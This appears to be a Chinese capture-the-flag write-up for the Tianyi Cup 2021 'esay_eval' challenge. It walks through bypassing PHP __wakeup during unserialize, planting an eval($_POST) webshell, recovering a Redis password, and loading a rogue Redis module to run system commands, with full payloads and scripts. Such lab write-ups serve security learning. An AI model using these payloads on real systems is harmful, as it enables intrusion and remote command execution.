[天翼杯 2021]esay_eval
esay_eval
源码:
<?php
class A{
public $code = "";
function __call($method,$args){
eval($this->code);
}
function __wakeup(){
$this->code = "";
}
}
class B{
function __destruct(){
echo $this->a->a();
}
}
if(isset($_REQUEST['poc'])){
preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
if (isset($ret[1])) {
foreach ($ret[1] as $i) {
if(intval($i)!==1){
exit("you want to bypass wakeup ? no !");
}
}
unserialize($_REQUEST['poc']);
}
}else{
highlight_file(__FILE__);
}
反序列化
上来是个简单的反序列化拿shell,但是有个小限制就是,A类里面的__wakeup()
函数会把我们传进去的$code
属性置为空,因此这里需要让__wakeup()
函数失效,序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup的执行,并且不会报错,可以被正常反序列化。因此这里我们只需再加一个属性,然后把序列化后的字符串中属性的个数改回1个,就可以绕过__wakeup()
。
poc:
<?php
class A{
public $code = "";
function __call($method,$args){
eval($this->code);
}
function __wakeup(){
$this->code = "";
}
}
class B{
function __destruct(){
echo $this->a->a();
}
}
$a = new A();
$b = new B();
$a->code = 'phpinfo();';
$b->a = $a;
$b->test = "test";
$data = serialize($b);
echo $data;
得到payload:
?poc=O:1:"B":1:{s:1:"a";O:1:"A":1:{s:4:"code";s:10:"phpinfo();";}s:4:"test";s:4:"test";}
但是从phpinfo发现禁用了许多系统的调用函数,需要进行进一步的挖掘。
redis主从复制漏洞
首先同样方法构造一个一句话:
?poc=O:1:"B":1:{s:1:"a";O:1:"A":1:{s:4:"code";s:20:"eval($_POST["cmd"]);";}s:4:"test";s:4:"test";}
然后用蚁剑连上去,可以看到目录下有个.config.php.swp
文件,打开可以看到有redis数据库的名字用户和密码。
<?php
define("DB_HOST","localhost");
define("DB_USERNAME","root");
define("DB_PASSWOrd","");
define("DB_DATABASE","test");
define("REDIS_PASS","you_cannot_guess_it");
接着发现/tmp目录是能够写文件的,因此我们可以上传文件进去,并且可以看到有redis服务的日志文件,因此可以判断是需要利用redis漏洞。
这里利用到了redis的主从复制漏洞,rce:https://github.com/vulhub/redis-rogue-getshell
由于这道题无法从外部访问redis,因此需要通过蚁剑上传生成的exp.so扩展,然后再上传脚本,运行脚本加载扩展进行攻击。
<?php
$host='127.0.0.1';
$fp = fsockopen("$host", 6379, $errno, $errstr, 30);
$out = "AUTH you_cannot_guess_it\r\n";
$out .="module load /tmp/exp.so\r\n";
$out .="system.exec 'ls /'\r\n";
$out .= "QUIT\r\n";
fwrite($fp, $out);
while (!feof($fp)) {
echo fgets($fp, 128);
}
fclose($fp);